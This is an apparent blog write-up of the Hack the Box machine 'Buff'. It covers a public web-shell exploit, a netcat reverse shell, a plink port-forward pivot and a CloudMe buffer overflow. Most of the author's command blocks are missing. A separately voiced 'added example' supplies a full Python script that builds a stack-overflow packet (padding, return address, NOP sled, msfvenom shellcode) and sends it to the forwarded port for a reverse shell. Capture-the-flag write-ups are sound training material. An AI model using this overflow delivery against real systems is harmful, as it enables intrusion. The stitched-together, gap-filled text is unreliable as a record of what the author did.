Introduction

The box Buff from Hack the Box is one of the best ways to dip your toe into buffer overflow exploits. This box also has one of the easiest user flags I have ever seen.

With every machine, I start with AutoRecon:


With AutoRecon I definitely recommend the -vv flag: the output it prints to the screen while it is running can be extremely useful.

Port 8080 was open, so I immediately went to the browser.

mrb3n's Bro Hut

I navigated through the pages and noticed:

Gym Management Software 1.0

This was a direct clue. I Googled it word for word with "exploit" appended and found the matching entry on Exploit DB.

Using Exploit DB 48506 to connect to the web shell.

You officially have the easiest user flag. The first thing I looked for was a way to get a more stable shell than the web shell; thankfully plink.exe and nc.exe were already sitting in the Uploads directory. After rooting the box I went back and looked for the best way to get the files you will need (if a good Samaritan didn't leave them on the box).

Downloading Files

First, set up a local HTTP server on your attacking machine:

Next, grab the files you will need from the target:

Finally:

Nice! Now you are that good Samaritan. Next, start your listener for the reverse shell and use:

NC session activate!

Once on the box, I went into the Public directory and created a folder to work from. I tried running WinPEAS and Seatbelt with no success. Eventually, I found CloudMe_1112.exe sitting in the Downloads folder.

The moment I began crying :(.

It occurred to me that BUFF plus a 'random' .EXE probably meant a buffer overflow exploit (which I am terrible at). Thankfully this box is EASY and Google led me to Exploit DB 48389.

After downloading the exploit you will see a line which references msfvenom. This is the command that builds the shellcode the exploit delivers, and it is what gives you your shell on the machine:

The first thing I would recommend is to make a directory inside the Public directory and copy plink/netcat into it. This makes things a ton easier, as other players on the box might otherwise mess up your progress.

I would recommend generating the shellcode with the -v payload option: by default msfvenom names the variable buf, so without it I had to find/replace buf with payload to match the exploit. Copy the output into the exploit. Next, I had to add import sys at line 12, as the script threw errors without it.

48389.txt – Download

I tried to run the exploit and realised that Python was not available on the machine. I tried py2exe but had issues compiling. Finally, I pivoted using plink.exe.

To pivot successfully, make sure SSH is running on your attacking machine. Below is a reference to the command I used; inside the Public folder, I ran the following:

Notice above that I forwarded port 8888, because that is the port referenced on line 53 of the exploit for the connection. If you have done this correctly you will have an SSH session back on your attacking VM with the forward in place. Finally, run the following:

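What that final step actually sends, as an added example that is not the page's own code and not a copy of Exploit DB 48389: a small Python script that reassembles the msfvenom "-f python -v payload" output into bytes, checks it for bad characters, lays out the overflow packet (padding up to the saved return address, the gadget address, a NOP sled, the shellcode, filler to a fixed size) and delivers it to 127.0.0.1:8888, which, with the plink -R forward up, is CloudMe's port on the target. The offset, return address and packet size below are placeholders I have assumed for illustration; take the real ones from the exploit you are running. The msfvenom output is a constructed sample, not real shellcode.

```python
import re
import socket
import struct

# Placeholder values (assumptions for illustration, not taken from EDB 48389):
# the real offset, gadget address and packet size come from the exploit.
EIP_OFFSET = 1052            # bytes of padding before the saved return address
RET_ADDR = 0x68A842B5        # example address of a PUSH ESP; RET style gadget
TOTAL_LEN = 1500             # fixed packet size the exploit sends
BAD_CHARS = b"\x00\x0a\x0d"  # bytes msfvenom was told to avoid with -b

# Constructed sample of what "msfvenom ... -f python -v payload" prints.
# Not real shellcode: a few bytes are enough to exercise the parser.
SAMPLE_MSFVENOM_OUTPUT = r'''
payload =  b""
payload += b"\xfc\xe8\x82\x90\x90\x90\x60\x89\xe5"
payload += b"\x31\xc0\x64\x8b\x50\x30"
'''

_LINE_RE = re.compile(r'^\s*(\w+)\s*\+?=\s*b?"((?:\\x[0-9a-fA-F]{2})*)"\s*$')


def parse_msfvenom_python(text, var="payload"):
    """Reassemble shellcode bytes from msfvenom's '-f python' output.

    msfvenom names the variable 'buf' unless '-v NAME' is given, while the
    exploit script expects a specific name; lines for any other variable
    are ignored rather than silently merged, which is the find/replace
    problem the -v option avoids."""
    shellcode = bytearray()
    for line in text.splitlines():
        m = _LINE_RE.match(line)
        if not m or m.group(1) != var:
            continue
        hex_pairs = re.findall(r'\\x([0-9a-fA-F]{2})', m.group(2))
        shellcode += bytes(int(h, 16) for h in hex_pairs)
    return bytes(shellcode)


def find_bad_chars(shellcode, bad_chars=BAD_CHARS):
    """Return (index, byte) pairs for bytes that would truncate or corrupt
    the payload on the way in (NUL for string copies, CR/LF for
    line-oriented parsers)."""
    return [(i, b) for i, b in enumerate(shellcode) if b in bad_chars]


def build_overflow(shellcode, eip_offset=EIP_OFFSET, ret_addr=RET_ADDR,
                   total_len=TOTAL_LEN, nop_sled=16):
    """Lay out the classic stack overflow packet:
        [padding][saved EIP -> gadget][NOP sled][shellcode][filler]
    After RET pops the overwritten return address, ESP points at the bytes
    that follow it, so a PUSH ESP; RET or JMP ESP gadget lands on the NOP
    sled and execution slides down into the shellcode."""
    bad = find_bad_chars(shellcode)
    if bad:
        raise ValueError(f"shellcode contains bad chars at {bad}")
    ret = struct.pack("<I", ret_addr)  # little-endian, as stored on the stack
    body = b"\x90" * eip_offset + ret + b"\x90" * nop_sled + shellcode
    if len(body) > total_len:
        raise ValueError(f"payload is {len(body)} bytes, limit is {total_len}")
    return body + b"\x90" * (total_len - len(body))


def send_overflow(packet, host="127.0.0.1", port=8888):
    """Deliver the packet. With 'plink -R 8888:127.0.0.1:8888' from the box
    to the attacking machine, 127.0.0.1:8888 locally is CloudMe on the
    target, so the exploit runs from the attacking VM even though the box
    has no Python."""
    with socket.create_connection((host, port), timeout=10) as s:
        s.sendall(packet)
    return len(packet)


if __name__ == "__main__":
    sc = parse_msfvenom_python(SAMPLE_MSFVENOM_OUTPUT)
    pkt = build_overflow(sc)
    print(f"{len(sc)} shellcode bytes, {len(pkt)} byte packet, EIP -> {RET_ADDR:#010x}")
    # send_overflow(pkt)  # run on the attacking machine once the forward is up
```

Start the netcat listener for the reverse shell before sending; the shellcode connects back as soon as the overflow lands, and the connection only has to reach the attacking machine, not the target, because the forward is in the other direction.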
Rooted.

Published On: January 17th, 2021 / Categories: HTB, Technology